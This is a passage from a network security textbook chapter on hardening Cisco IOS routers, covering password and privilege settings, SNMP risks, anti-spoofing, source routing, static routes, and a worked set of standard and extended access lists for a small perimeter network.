2611 | 2 Ethernet (RJ45), 1 Network Module slot, 2 WAN Interface Card slots, 1 AIM slot | Port specific (maximum = 100Mbps)

Where to Begin

Cisco routers are extremely flexible devices. The number of configurable options can be downright daunting. For example, the online "Cisco IOS Software Command Summary" for IOS 12.1 (the latest major OS release) is hundreds of pages long. Keep in mind this is a "summary," not a fully detailed manual; it's not exactly something you can toss in your shirt pocket!

A full description of how to configure a Cisco router is beyond the scope of this book. This section will simply focus on how to implement your security policies using this device. We will therefore assume the following:

• IOS 12.0 or higher has been loaded on the router.
• The router is powered up and physically connected to your LAN and WAN.
• Both interfaces have a valid IP address and subnet mask.
• You can ping the router at the other end of the WAN located at your ISP.
• You are reasonably familiar with the Cisco command interface.

Once these requirements have been met, you are ready to start locking down your perimeter.

Basic Security Tips

The place to start in securing your perimeter is to insure that the router itself does not become compromised. The router will be of little use in controlling traffic across your borders if Woolly Attacker can change the configuration. A Cisco router offers various levels of access:

• User EXEC mode
• Privileged EXEC mode

User EXEC Mode

User EXEC mode is the first mode of operation you reach when connecting to a Cisco router. If you are running a direct console session, you are placed in user EXEC mode automatically. If you are connecting to the router via a telnet session, you are first prompted for a terminal password.
Note: A Cisco router will deny all telnet session attempts if a terminal password has not been set.

A Cisco router changes the terminal prompt depending on which mode of operation you are currently using. The prompt always starts with the name of the router and ends with a special sequence to let you know where you are. Table 6.2 lists some of the more common prompts. Don't worry about the meaning of the other prompts for now; we will cover them in the next section.

Table 6.2: Cisco Command Prompts

Prompt Appearance | Description
router> | User EXEC mode
router# | Privilege mode
router(config)# | Global configuration mode
router(config-if)# | Interface configuration mode

While in user EXEC mode, a user is allowed to check connectivity and to look at statistics, but not to make any type of configuration changes to the device. This helps to limit the amount of damage that can be done by an attacker if your terminal password is compromised or if the attacker can gain physical access to the device.

Privilege Mode

A user must enter user EXEC mode before entering privilege mode. This means that a remote attacker must compromise two passwords in order to gain full access to the router. Privilege mode, by default, is the big kahuna. At this level of access, a user is free to change or even delete any configuration parameters. You enter privilege mode by entering the command

enable
password: privilege_password

Since you use the command enable to gain privilege access, this mode is sometimes referred to as enable mode. In the past, the command given to change the enable password was as follows:

enable password new_password

However, Cisco now recommends using the following command, which uses a stronger encryption algorithm:

enable secret new_password

You can actually specify up to 16 different levels (0-15) of privilege-level access, each with its own unique password. In this case, the password a user enters when accessing privilege mode determines what level of privileged access the user receives. This can be useful if you need to allow an administrator access to some privilege-level commands, but not all. To set a password for a specific privilege level, enter the command

enable secret level {level} {new_password}

where {level} is replaced by some value between 0 and 15. The lower the value, the lower the level of privilege-level access.
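For example, a minimal sketch (the level number, password strings, and reassigned command here are placeholders, not recommendations) might give junior staff a limited privilege level while reserving full access for senior administrators:

! Password for partial (level 5) privileged access
enable secret level 5 Jr5taffOnly
! Password for full (level 15) privileged access
enable secret level 15 Fu11Acc3ss
! Optionally, move a specific command down to level 5
privilege exec level 5 configure

A user who enters the level 5 password can then use only the commands assigned to level 5 and below.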
Disabling All Unused Services

A common security practice on any network-enabled device is to disable all unused services. Examples of services that should be disabled if unused include:

• SNMP
• NTP (Network Time Protocol)
• CDP (Cisco Discovery Protocol)

Note: NTP and CDP are enabled by default. To turn off CDP, use the no cdp run command. For NTP, use the ntp disable command on each interface that is not using NTP.

Changing the Login Banner

It's a good idea to change the logon screen banner so a customized message is displayed. If an attacker tries to access your router, the last thing you want him to see is a "welcome" message. Your message should reflect your organization's stance on unauthorized access to network hardware. Change the banner with the following command:

banner login # message #

where # can be any ASCII character used as a delimiter. This character cannot be used in the message itself; it simply lets the command know where the message ends, so you can place your message over multiple lines in order to change its appearance. You must be in privilege mode to use this command. An example of this command would be

banner login # Unauthorized access prohibited #

Changing the Terminal Password

A Cisco router running IOS 12.1 can support multiple concurrent telnet sessions. It is a good idea to change these passwords on a regular basis to help insure that the device is not compromised. To change the password for one of these connections (the first, labeled 0), enter privilege mode and enter the following commands:

line vty 0
login
password 2SeCret4U

Tip: Remember that Cisco passwords are case sensitive, so use a combination of cases to make the password harder to guess.

Since you cannot select which vty you wish to use when connecting remotely, Cisco recommends that you set all vty passwords to the same character string.
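For instance, the following sketch (the password string is only a placeholder) applies one password to all five default vty lines in a single step:

line vty 0 4
login
password 2SeCret4U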
Using Stronger Password Authentication

A weakness of the Cisco password system in the past was that there was no accounting capability. Since each administrator was using the same passwords, there was no audit trail to see who made which changes. Beginning with IOS 12.0, Cisco has adopted a new security paradigm called AAA (Authentication, Authorization, and Accounting) to account for this and other weaknesses in the password system:

Authentication: This is the method of identifying users, whether via login/password, challenge/response, messaging support, and/or encryption. AAA authentication is applied by creating a named list of one or more authentication methods that are then bound to one or more interfaces.

Authorization: This is the method of controlling access, including one-time or service-based authorization, per-user account and profile, user group, and protocol-based access control (IP, IPX, ARA, and telnet).

Accounting: This is the method of collecting information that is then used to bill, audit, and report network activities. Types of information include user identities, start/stop times, commands issued (like FTP get), and number of packets and/or bytes. Through accounting, users are associated with the resources they have accessed.

Cisco has chosen to implement industry-standard technologies along with AAA, including RADIUS, TACACS+ (Terminal Access Controller Access Control System), and Kerberos. Authentication configured outside of AAA cannot work with these standards. Here is how Cisco implements them in AAA:

RADIUS: Routers are RADIUS clients, transmitting authentication information to a RADIUS server.

TACACS+: The database is maintained by a service running on a UNIX or NT machine. Routers pass requests to the TACACS+ service.

Kerberos: Kerberos is used to verify that users and the network services they use are really who and what they claim to be. Routers can verify this by analyzing the Kerberos ticket assigned to authorized users.

SNMP Support

Simple Network Management Protocol (SNMP) can be used to collect statistics as well as to make configuration changes to a Cisco router. This is done through the use of community strings. In brief, a community string is a password system that identifies a specific level of access for a device (either read-only or read-write). For example, most devices come preconfigured to use a community string of public for read-only access to the device. Anyone who accesses the router via SNMP using this community string is automatically granted access.

Besides poor authentication, SNMP has another major security flaw: it transmits all information in clear text. Anyone monitoring the network can grab the community name from passing traffic. SNMP also uses UDP as a transport. As you saw in Chapter 5, UDP can be extremely difficult to filter due to its connectionless state.

For these reasons, you should avoid using SNMP on your routers if possible. While the manageability can be a real bonus in a large environment, this back-door access to your router can be a serious security concern.

Tip: If you must use SNMP, use SNMPv2. The latest version supports MD5 authentication to help improve security. While this security is not foolproof, it is far better than the original SNMP specification. Cisco router versions 10.3 and up support SNMPv2.
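If you must leave SNMP enabled, you can at least restrict it. A minimal sketch, assuming a hypothetical management station at 206.121.73.50 (the community string is a placeholder), permits read-only queries from that one host only; alternatively, no snmp-server disables the SNMP agent entirely:

! Permit SNMP queries only from the management station
access-list 10 permit 206.121.73.50
! Read-only community, restricted by access list 10
snmp-server community N0tPubl1c ro 10
! Or disable the SNMP agent completely:
! no snmp-server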
Guarding Your Configuration File

The configuration of a Cisco router can be displayed by entering the command

write term

or

show running-config

The configuration can even be backed up to a remote server using the TFTP protocol. A sample header from a Cisco router configuration file is shown below:

! Cisco router configuration file
hostname lizzybell
enable secret 5 $1$722$CE
enable password SuperSecret
line vty 0 4
password SortaSecret
!

The privilege mode (enable) password is encrypted using a one-way encryption algorithm. This way, anyone who sees your configuration file does not immediately become privy to this password. The enable password string is simply used for backward compatibility: if this configuration file were mistakenly loaded on an older-revision router that does not support encrypted passwords, this password would be used instead of the encrypted one.

The telnet session passwords are in clear text, however, so this file should be guarded as closely as possible. If this file is loaded via TFTP, an attacker monitoring the network now has the first password required to access this device. To better safeguard this information, you can encrypt all passwords by typing the following command in global configuration mode:

service password-encryption

This will encrypt the memory copy of all password strings. In order to make this change permanent, you need to save it by typing

write mem

or

copy running-config startup-config

Even though all your password strings are now encrypted, you should still take precautions to safeguard the configuration file. Cracker programs exist that attempt to guess a password's value by comparing the encrypted string to entries located in a dictionary file. If a match is found, the clear-text equivalent of the password is returned. The only way to prevent this type of attack is to insure that even your encrypted password strings do not fall into the wrong hands.

Protect Against Spoofing

Woolly Attacker uses spoofing to transmit a packet that appears to originate from the secure side of a firewall when in actuality it comes from an unsecured network. There are several methods to prevent spoofing on Cisco routers:

• Use access lists: Configure input access lists on all interfaces to pass traffic only if it comes from known (or expected) source addresses. All other traffic is denied.

• Disable source routing: Source routing should be disabled on all interfaces. (See the section "Source Routing" later in this chapter.)

• Turn off minor services: Also referred to as small servers, these services normally aren't critical to most network infrastructures but have the potential of being exploited. The command no service tcp-small-servers is an example of how to turn these off for IP communications.

Disable Directed Broadcasts

DoS (denial-of-service) attacks work by flooding a target computer with so much information (or so many connection requests) that the target is unable to service legitimate requests. One of the tools used by hackers to achieve these types of attacks is the capability of routers to forward directed broadcasts. To disable directed broadcasts, enter

no ip directed-broadcast

Routing

By default, Cisco routers ship with IP routing enabled, so you won't have to change this functionality. You do, however, need to consider how best to update your router regarding which subnets you are running on your internal network. The router automatically knows about any locally connected networks. In order to reach any subnets beyond these, you must tell the router specifically how to reach them.

Sometimes this is not an issue. For example, take a look at Figure 6.1. Our firewall is performing network address translation (NAT) for our internal network. All traffic the router sees will appear as though it came from the locally attached segment. In this case, no other route entries are required beyond a default route. The router does not need to know about the 192.168.1.0 network because we are using NAT.

Figure 6.1: Our router does not need a route entry for the internal network because the firewall is performing NAT.

If you do have additional subnets that the router will need to know about, you need to decide between creating static entries on the router (static routing) or using a dynamic protocol such as RIP or OSPF so the router can receive route information automatically (dynamic routing). There are strengths and weaknesses to either choice, depending on your configuration.

Static routing is far more secure from a security perspective. If the router has been programmed with your route configuration, an attacker cannot change this information without compromising the router. If a dynamic protocol is used, an attacker may be able to send false updates to the router, thus corrupting the routing table.

Dynamic protocols are useful if you are running multiple paths to the same network. For example, if you had multiple links leading to the Internet, it might be beneficial to use a dynamic routing protocol for redundancy or even load balancing. If you must use a dynamic routing protocol, use one that supports authentication, such as OSPF. This will at least afford you some level of security. Routing protocols such as RIP simply trust that any host sending them routing information must know what it is talking about.

Note: See Chapter 3 for more on dynamic routing protocols.
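As a rough sketch of what such authentication looks like (the OSPF process ID, key ID, and key string below are arbitrary placeholders), OSPF with MD5 authentication might be configured along these lines:

router ospf 10
network 206.121.73.0 0.0.0.255 area 0
area 0 authentication message-digest
!
interface serial 0
ip ospf message-digest-key 1 md5 s3cretK3y

Both routers on the link must be configured with the same key before they will exchange route updates, which is exactly what keeps an attacker from injecting false routes.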
Most of the Internet connections in use have but a single link between the organization and its ISP. For these environments, static routing is preferred. The slight maintenance increase caused by having to manually configure your routing table will be well worth the additional security.

Configuring Static Routing

At a minimum, you will need to configure your router with a default route setting. The default route tells the router, "If you do not have a routing table entry for a particular subnet, forward the data to this other router and let that router figure out how to deliver it." The default route should be configured to use your ISP's router at the other end of the WAN link.

A default route can be configured by entering global configuration mode and typing the command

ip route 0.0.0.0 0.0.0.0 xxx.xxx.xxx.xxx

where xxx.xxx.xxx.xxx is the IP address of the default router. Once you have created a default route, you will need to enter static routes for each of your internal subnets using legal addresses. While still in global configuration mode, enter the command

ip route yyy.yyy.yyy.0 255.255.255.0 xxx.xxx.xxx.xxx 1

You must do this once for each subnet you need to add. The command breaks down as follows:

ip route: Add a static IP routing entry.

yyy.yyy.yyy.0: Replace this value with the IP subnet address.

255.255.255.0: Replace this value with a valid subnet mask address.

xxx.xxx.xxx.xxx: Replace this value with the IP address of the next-hop router.

1: This is the metric, or cost, associated with following this path. Use a value of 1 unless you have multiple paths to the same destination. In that case, set the most preferred route to 1 and the alternate route to 2.

Let's walk through an example to see how this would be configured. If you look at Figure 6.2, you will see that you actually have multiple routers within your environment that you need to configure.

Figure 6.2: Defining static routes on multiple routers

Notice that each router has a default route setting. If you start at the very back of the network (206.121.76.0 or 206.121.78.0), you can see that the default route entries lead all the way out to the Internet. This is a good thing, because it is all the subnets out on the Internet that we wish to avoid programming into our routers. The default route acts as a catchall for any undefined routes.

Note: Our two most distant routers in Figure 6.2 (206.121.75.2 and 206.121.77.2) are only using a default route. There are no static route entries. This is because you need to pass through the default router in order to reach any subnet that is not directly attached to these devices. While you could add static route entries, they would be redundant.

Finally, notice that we did not add a route entry into any of our routers for the DMZ. This is because it is unnecessary. Our Internet router is directly attached to this segment, so it already knows how to get there. As for the other routers, the DMZ can be reached by simply utilizing the default route entry.
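Pulling these commands together, a minimal sketch for one of the intermediate routers (the addresses here are illustrative, not taken from the figure) might look like this:

! Catchall: send everything unknown toward the ISP
ip route 0.0.0.0 0.0.0.0 206.121.73.1
! Internal subnet reached through the next router back
ip route 206.121.76.0 255.255.255.0 206.121.75.2 1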
Source Routing

We need to make one final routing change before we are finished: disabling source routing. Typically, IP packets contain no routing information; the packets leave the selection of the best route up to the network routing hardware. It is possible, however, to add to the header information the route you wish the packet to take when accessing a remote system. This is referred to as source routing.

When a router receives a source-routed packet, it forwards the information along to the next hop defined in the header. Even if the router is sure that it knows a far better path for reaching the remote system, it will comply with the path specifications within the packet header. Typically, when a remote system receives a source-routed packet, it will reply to the request along the same specified path.

Source routing can be used by an attacker to exploit potential back doors within your network. For example, let's say that your company has invested a lot of time and money in a proper firewall solution. You have taken every effort to lock down your Internet connection as tightly as possible.

Let's also assume that you have a WAN link to a remote business partner that connects to your network behind the firewall. This organization also has an Internet connection, but unlike yours, it is made up of very trusting souls who think all the security hype is a marketing ploy by firewall vendors. For this reason, your business partner has zero protection at its network perimeter.

Using source-routed packets, it is possible for a potential attacker to send traffic first to your remote business partner, then have the traffic sent over the WAN link to your network by including source route information within the packets of data. Despite all your security efforts, Woolly Attacker has found an easy-access entrance to your networking environment. The only thing missing is valet parking.

Source routing can be a bad thing and should be disabled at all your network perimeters. The only legitimate reason for allowing source-routed packets is if you need to do connectivity diagnostics across specific links on the Internet. Since this is not an activity many of us must do, it is best to leave the feature disabled. To disable source routing, enter global configuration mode and enter the command

no ip source-route

Cisco Security Features

Table 6.3 provides a list of the various security features in the Cisco IOS (some fairly recent):

Table 6.3: Cisco IOS Security Features

Feature | Description
Standard Access Lists and Static Extended Access Lists | Enable basic filtering by evaluating packets at the network layer (some extended access lists can also evaluate information at the transport layer).
Dynamic Access Lists (also known as Lock-and-Key) | Provide temporary access to authenticated users.
Reflexive Access Lists | Allow incoming TCP or UDP packets only if they belong to a session initiated from inside the firewall.
TCP Intercept | Protects against SYN flood attacks (a type of DoS attack).
Context-Based Access Control | Examines application layer information to determine not just state, but context, of all TCP and UDP connections in order to dynamically open or close connections as necessary. Also responsible for alerts and logs.
Intrusion Detection | Compares all network traffic with stored signatures, reacting to detected intrusions by sending an alarm, resetting the connection, or dropping the connection.
Authenticating Proxy | Applies user-based access policies (as opposed to group- or IP-based policies).
Port/Application Mapping | Enables Context-Based Access Control to work on non-registered (non-standard) or custom ports.
NAT | Hides private IP addresses from the public Internet.
User Authentication and Authorization | Verifies identity and permission level based on user accounts.

At the core of all of these security methods is the access list. Cisco access lists (also called filters) are used to selectively pass or block traffic received by a Cisco router. The router evaluates each packet received against the criteria defined in an access list, such as the source or destination address of the information, the upper-layer protocol, the time, user identity, or other factors. Access lists are useful for controlling traffic that attempts to pass your network perimeter. Since a router is typically used to segregate or partition network segments anyway (for instance, to separate your network from a business partner or the Internet), you can see why these devices contain some form of advanced filtering capability.

Cisco routers provide two methods of filtering traffic. The simplest is the standard access list, while extended access lists are used for more granular control. Once an access list is created, it is applied to a specific interface on the router. The access list is then told to screen either inbound network traffic (traffic coming from the attached network to the interface) or outbound network traffic (traffic leaving the router and headed toward the attached network). This ability to filter either inbound or outbound traffic can be a real time-saver in complex configurations.

In Cisco IOS 12.1, IP and IPX extended access lists can also be used with time ranges. Permit and deny statements are then activated in accordance with their associated time ranges. Other advantages are:

Increased control: Resources (such as an IP address/mask pair and port number, policy routing, or on-demand link creation) are linked to available times.

Better integration: Time-based policy can be linked with Cisco's firewall and IPSec products.

Reduced cost: Traffic can be rerouted to less expensive links based on time of day.

Increased efficiency: Access list entries do not have to be processed outside their active times of day.

To create a time range, use the following command:

time-range {name of time range}

To define the actual time range, enter this command:

periodic {days of the week} {hh:mm} to {days of the week} {hh:mm}

Access List Basics

Access lists are generated by creating a number of test conditions that become associated with list identifier numbers. Access lists are created while in global configuration mode and use the following syntax:

access-list {list #} permit/deny {test condition} {time range}

You would repeat this command for every test condition you wish to use in order to screen traffic (such as allow SMTP, deny HTTP, and so on). The list number you use identifies which protocol you would like to apply these rules to.
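A brief sketch of how these pieces fit together (the range name, hours, and list number are placeholders, and the access list entry uses the extended form covered later in this chapter): this defines a business-hours range and attaches it to a rule that permits HTTP only during those hours:

time-range workhours
periodic weekdays 8:00 to 17:00
!
access-list 101 permit tcp any any eq 80 time-range workhours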
Table 6.4 shows protocols associated with names, and Table 6.5 shows protocols associated with list numbers.

Table 6.4: Cisco Access Control Lists by Name

Protocol
Apollo Domain
IP
IPX
ISO CLNS
NetBIOS IPX
Source-route bridging NetBIOS

Table 6.5: Sample of Cisco Access Control Lists by Number

Protocol | List Type | Range Identifier
IP | Standard | 1-99; 1300-1999
IP | Extended | 100-199; 2000-2699
Ethernet type codes | N/A | 200-299
AppleTalk | N/A | 600-699
Ethernet addresses | N/A | 700-799
IPX | Standard | 800-899
IPX | Extended | 1000-1099

Note: Some protocols require that their associated access lists be identified only by name, others only by number, and the rest can be identified either way.

Notice that only one type of filtering is supported for certain protocols. As of Cisco IOS 11.2 and higher, the range identifiers used by IP can be replaced by an alphanumeric name. This name can be up to 64 characters long but must start with an alphabetic character. The name must be unique, and each name can only describe a single set of standard or extended filters. You cannot combine the two. The syntax for creating an access list name is

ip access-list standard/extended {name}

Tip: Using names instead of access list numbers can be extremely beneficial. Doing so extends the number of unique lists you can create and allows you to associate a descriptive name with a particular set of filters (such as "spoofing"). Also, reflexive filters can only be associated with an access list name; you cannot use an access list identifier number.

Access lists are processed in the order you create them: if you create five filter conditions and place them in the same access list, the router will evaluate each condition in the order it was created until the first match is found. Conditions are processed as "first fit," not "best fit," so it is important to pay close attention to the order you use. For example, let's say you have an access list that states

• Allow all internal systems full IP access to the Internet.
• Do not let any internal systems telnet to hosts on the Internet.

Since the first rule states, "All outbound traffic is OK," you would never actually make it to the second rule. This means that your internal users would still be able to use telnet.

Once you have created an access list that you wish to apply to your router, enter configuration mode for a specific interface and enter the command

{protocol} access-group {list # or name} in/out

To remove an access list from an interface (always a good thing to do if you are testing a new filter), simply precede the command with the word no, as follows:

no {protocol} access-group {list # or name} in/out

Likewise, to delete an entire access list, enter the command

no access-list {list # or name}

Keep in mind that this will delete all filter conditions associated with a particular access list number or name. One of the biggest drawbacks of access lists is that you cannot edit entries. This can make data entry a bit tedious. For example, if you have created 15 access list entries and realize that you actually want entry 11 processed after entry 13, you must delete the entire list and recreate it from scratch.
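To make the ordering pitfall concrete, here is a sketch of the telnet example above written both ways (the list numbers are arbitrary, and the entries use the extended syntax described later in this chapter):

! Wrong order: the blanket permit is evaluated first,
! so the telnet deny below it can never match
access-list 110 permit tcp 206.121.73.0 0.0.0.255 any
access-list 110 deny tcp 206.121.73.0 0.0.0.255 any eq 23
! Correct order: screen for telnet first, then permit the rest
access-list 111 deny tcp 206.121.73.0 0.0.0.255 any eq 23
access-list 111 permit tcp 206.121.73.0 0.0.0.255 any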
Tip: Create your access lists offline in a text editor. Once you have the filters in the correct order, simply copy the rules to the Windows Clipboard and use the Paste ability of your terminal emulator. This also allows you to keep a local backup of all your filter conditions.

All access filters have an implicit deny at the end. This means that if you do not tell the router to specifically allow a certain type of traffic to pass, it will assume that it should be blocked. For example, if your access list states, "Traffic from the subnet 192.168.1.0 is OK to let through," the router will assume that it should block traffic from all subnets except 192.168.1.0. This feature helps to insure that you do not let anything through that you did not mean to.

Standard Access Lists

Standard access lists allow you to filter on source IP address. This is useful when you wish to block all traffic from a specific subnet or host. A standard access list does not look at the destination IP address or even the service; it makes its filtering determination based solely on the source address of the transmitting system.

While this sounds a bit limiting, it can actually be quite useful. Examine Figure 6.3. Here we have a very simple network design. There is only one way in and out of the network, which is through the router. The internal network segment uses an IP subnet address of 206.121.73.0.

In this environment, the router should never see any traffic originating from the Internet that appears to have originated from the IP subnet 206.121.73.0. This is because that segment is directly connected to the Ethernet port of the router. While the router will see traffic originating from this subnet on its Ethernet port, it should never be detected off of the serial (WAN) port.

Figure 6.3: Using standard access lists

IP spoofing is a process in which an attacker pretends to be a system on your local network transmitting information, even though he is off at some remote location. This can be used to exploit certain system vulnerabilities. For example, Microsoft Windows is vulnerable to a type of attack known as Land. A Land attack packet has the following attributes:

Source IP: The IP address of the system under attack
Destination IP: The IP address of the system under attack
Transport: TCP
Source port: 135
Destination port: 135
Flag setting: SYN=1

There are other ports and settings that can be used, but this should give you the general idea. The attack fools the system into thinking it is talking to itself. This will produce a race condition, which will cause the system to eventually hang or lock up.

You may be thinking, "No problem, I plan to block all inbound connection requests, so this packet would never get through because the SYN flag is set high." Not true, Grasshopper: look at the source address. When the router evaluates this packet, it may very well think that the packet was received from the internal network.

While Cisco routers do not have this problem (they maintain the association of the packet with the interface it was received on), many routers do. If your access rules state, "Port 135 from the internal network is OK to let through," the router will approve the packet of data and pass the information along to the routing process, which would then pass the traffic along to the Ethernet segment.
So how do you solve this problem? Since you will never see legitimate traffic originating from the Internet that uses your internal subnet address, there will be no loss in connectivity if you filter out such traffic. This is called a spoofing filter, because you are insuring that no traffic trying to spoof your internal address will be allowed to pass.

It is also a good idea to place an inbound filter on your Ethernet port that states, "Only accept traffic from the 206.121.73.0 subnet." This helps to insure that none of your internal users attempts a spoofing attack on some other network. As administrator, it is your job not only to protect your own environment, but also to make sure you do not inadvertently make someone else's life miserable.

You can create spoofing filters using standard access lists. The syntax for a standard access list entry is

access-list {list # or name} permit/deny {source} {mask}

So you could create the following access list entries in global configuration mode on the router in Figure 6.3:

access-list 1 deny 206.121.73.0 0.0.0.255
access-list 2 permit 206.121.73.0 0.0.0.255

Access list 1 would be applied by entering configuration mode for the WAN interface and entering the command

ip access-group 1 in

Likewise, access list 2 would be applied by entering configuration mode for the Ethernet interface and entering the command

ip access-group 2 in

You may notice that the mask value looks a little strange. This is because this value is a pattern match, not a subnet mask. A pattern match uses the following criteria when evaluating a test condition:

0: The corresponding byte in the defined address must match the test condition exactly.

1: This is a wildcard character; any value in this byte is considered a match.

So in this example our pattern match says, "Any IP address which contains the byte values 206.121.73." As long as the first three bytes match the source IP address, the access list test condition considers it a match.

To match all network traffic, use the following address and mask:

0.0.0.0 255.255.255.255

This tells the Cisco router that all traffic is to be considered a match. When you write your access rules, this address and mask can simply be replaced by the word any. This is not very useful for standard access lists (if you do not want to accept any traffic, it's easier to just pull the plug), but it will come in handy when we get into extended access lists in the next section.

Access List Pattern Matching

If you think of the pattern match value as an "anti-subnet mask," you'll be in pretty good shape. The pattern match will always be the exact opposite of what you would use for a subnet mask. This is pretty easy to follow if you are filtering full subnet classes, but it can get a bit confusing if you are working with true subnetting.

For example, let's say that instead of a full class C network, you are only using a portion of this class C address space. Let's assume that the network address is 206.121.73.64 and the subnet mask is 255.255.255.224. In this case, what would you use for a pattern match to insure that you are only filtering on your network space?

All TCP/IP address space is actually created using a binary number system. We use decimals simply because these are easier for human consumption.
In order to determine the pattern match you will use, you first have to convert the last byte of the subnet mask to binary:

224 = 128 + 64 + 32 = 11100000

In the last byte you are using three bits for networking and five bits to identify each unique host. In order to ignore any host on your network, you would use a pattern match that has all the host bits set high, like this:

00011111 = 16 + 8 + 4 + 2 + 1 = 31

So in order to accommodate your new network address and subnet mask, you would need to change your access lists to the following:

access-list 1 deny 206.121.73.64 0.0.0.31
access-list 2 permit 206.121.73.64 0.0.0.31

In effect, you have told your access list, "Filter the packet when you see an address space value of 206.121.73.64 through 206.121.73.95 (64 + 31)." This lets you screen for your small chunk of this class C address space without having to filter or allow more than you need to.

Besides spoofing rules, why else might you use standard access lists? Standard access lists are extremely effective at blocking access from any undesirable remote site. This could be known attackers, mail spammers, or even competitors.

Remember that this connection is yours to manage as you see fit. There is no requirement that once you are connected to the Internet you must accept traffic from all sources. While accepting all traffic is considered the polite thing to do, it may not always make the most business sense.

For example, there are mailing lists and organizations that have dedicated resources to identifying spam sites. Spam, or unsolicited advertising e-mail, can be a waste of organizational resources at best, or it can cause a denial of service at worst. Many administrators now filter traffic from sites known to support (or at the very least fail to prevent) spammers and their activities. All traffic is filtered, because a site that does not control outbound spam mail typically makes no effort to prevent other types of attacks from being launched against your network.
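As a sketch (the address block 192.0.2.0 simply stands in for whichever network you wish to shun), a standard list that drops everything from one remote site while passing all other sources would look like this:

! Drop all traffic from the offending network
access-list 3 deny 192.0.2.0 0.0.0.255
! Accept everyone else
access-list 3 permit any

Applied inbound on the WAN interface with ip access-group 3 in, this silently discards the unwanted site's traffic before it ever reaches your internal hosts.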
Tip: A Cisco interface can only accept one access list per port, per direction. This means that you should only apply a standard access list when you won't need an extended access list. If you require the increased flexibility of an extended access list, simply incorporate your filters into a single list.

Static Extended Access Lists

Extended access lists take the concept of standard access lists one step further. Instead of simply filtering on source IP address, extended access lists can also filter on

• Destination IP address
• Transport (IP, TCP, UDP, ICMP, GRE, IGRP)
• Destination port number
• Packet type or code, in the case of ICMP
• Established connections (verifies that either the ACK or RST bit has been set)

Clearly, this can give you a much more granular level of control over your perimeter traffic. Extended access lists are created in global configuration mode using the following syntax:

access-list {list # or name} permit/deny {protocol} {source} {mask} {destination} {mask} {operator} {port} est (short for established, if applicable)

Valid operators are

lt: Less than
gt: Greater than
eq: Equal to
neq: Not equal to

As an example, let's say you wish to create a set of extended access rules allowing open access to HTTP on the host 206.121.73.10, and allowing telnet access as well, but only from hosts on the subnet 199.52.24.0. These rules would look similar to the following:

access-list 101 permit tcp any 206.121.73.10 0.0.0.0 eq 80
access-list 101 permit tcp 199.52.24.0 0.0.0.255 206.121.73.10 0.0.0.0 eq 23

You would then install these rules on the serial port by entering configuration mode for that interface and entering the command

ip access-group 101 in

Problems with FTP

As you saw in the section on FTP in Chapter 3, this protocol can be a real pain to support through a firewall. This is because the protocol actually uses two ports while transferring files. To review, you are stuck with the following:

• Standard FTP: All inbound service ports above 1023 must be left open to support the data connection.
• Passive FTP: All outbound service ports above 1023 must be left open to support the data connection.

In a world of the lesser of two evils, it is usually better to support only passive FTP. Passive FTP is supported by all Web browsers and most graphical FTP programs. It is typically not supported by command-line FTP programs.

In order to support passive FTP, you must allow all internal hosts to access any TCP port above 1023 on systems located out on the Internet. This is not the best security stance, but it is certainly far better than the standard FTP alternative.

If there are specific services you wish to block, you can create these access list entries before the entry that opens all outbound ports. Since the rules are processed in order, the deny rules would be processed first, and the traffic would be dropped. For example, let's say you wish to block access to X11 and OpenWindows servers, but you want to open the remaining upper ports for passive FTP use. In this case you would create the following rules:

access-list 101 deny tcp any any eq 2001
access-list 101 deny tcp any any eq 2002
access-list 101 deny tcp any any eq 6001
access-list 101 deny tcp any any eq 6002
access-list 101 permit tcp any any gt 1023

The only problem here is that you would receive random FTP file transfer failures when the client attempted to use ports 2001, 2002, 6001, or 6002. This would probably not happen often, but intermittent failures are usually the most annoying.

Creating a Set of Access Lists

Let's go through an example to see how this would all pull together. Let's assume that you have a network configuration similar to the one in Figure 6.4. You need to allow HTTP to the Web server and SMTP access to the mail server. The mail server also runs the local DNS process. Additionally, you would like to provide unrestricted outbound access to all TCP services.

Figure 6.4: Using access lists on a simple network

Your access list rules would look something like those that follow. Lines starting with an exclamation point (!) are considered comments or remarks by the Cisco IOS.
! Stop any inbound spoofing
access-list 1 deny 206.121.73.0 0.0.0.255
! Let in replies to established connections
access-list 101 permit tcp any 206.121.73.0 0.0.0.255 gt 1023 est
! Look for port scanning
access-list 101 deny tcp any any eq 19 log
! Allow in SMTP mail to the mail server
access-list 101 permit tcp any 206.121.73.21 0.0.0.0 eq 25
! Allow in DNS traffic
access-list 101 permit tcp any 206.121.73.21 0.0.0.0 eq 53
access-list 101 permit udp any 206.121.73.21 0.0.0.0 eq 53
! Allow in HTTP to the web server
access-list 101 permit tcp any 206.121.73.20 0.0.0.0 eq 80
! Let in replies if an internal user pings an external host
access-list 101 permit icmp any any echo-reply
! Allow for flow control
access-list 101 permit icmp any any source-quench
! Let in replies if an internal user runs traceroute
access-list 101 permit icmp any any time-exceeded
! Insure that our internal users do not spoof
access-list 2 permit 206.121.73.0 0.0.0.255
! Let out replies from the web server
access-list 102 permit tcp 206.121.73.20 0.0.0.0 any gt 1023 est
! Let out replies from the mail/DNS server
access-list 102 permit tcp 206.121.73.21 0.0.0.0 any gt 1023 est
! Let out DNS traffic from the DNS server
access-list 102 permit udp 206.121.73.21 0.0.0.0 any eq 53
! Block all other UDP traffic except for DNS permitted above
access-list 102 deny udp 206.121.73.0 0.0.0.255 any
! Allow a single host to create Telnet sessions to the router
access-list 102 permit tcp 206.121.73.200 0.0.0.0 206.121.73.1 0.0.0.0 eq 23
! Block all other hosts from creating Telnet sessions
! to the router
access-list 102 deny tcp any 206.121.73.1 0.0.0.0 eq 23
! Allow all remaining IP traffic through
access-list 102 permit ip 206.121.73.0 0.0.0.255 any

Once this list has been entered (or pasted) in global configuration mode, you would first go to configuration mode for the serial interface and enter the commands

ip access-group 1 in
ip access-group 101 in

You would then go to configuration mode for the Ethernet interface and enter the commands

ip access-group 2 in
ip access-group 102 in

When you're finished, your access lists will be active, and your router should begin filtering traffic. You should test your configuration immediately to make sure that all is working as you expect.

A Few Comments on Our Sample Access Lists

The third access list entry is labeled "look for port scanning." This is accomplished by logging a specific port so that any activity is displayed on the console terminal. As mentioned, routers typically have very poor logging capability; you do not want to log so much information that it scrolls off the screen before you catch it. By monitoring a port that you know an attacker will check (port 19 is chargen, or Character Generator, which has quite a few vulnerabilities), you can strike a good balance between not logging too much information and still catching suspect traffic.

Lines 12 and 13 limit outbound replies to only the Web and mail servers. Since these are the only two systems offering services, they are the only two that should be sending replies back to Internet hosts. Lines 14 and 15 limit UDP traffic to DNS and only from the DNS server. Since UDP is unreliable, it is also insecure; these filters limit your vulnerability to a single system. Of course, this means that all internal hosts will need to use the mail system for DNS resolution.
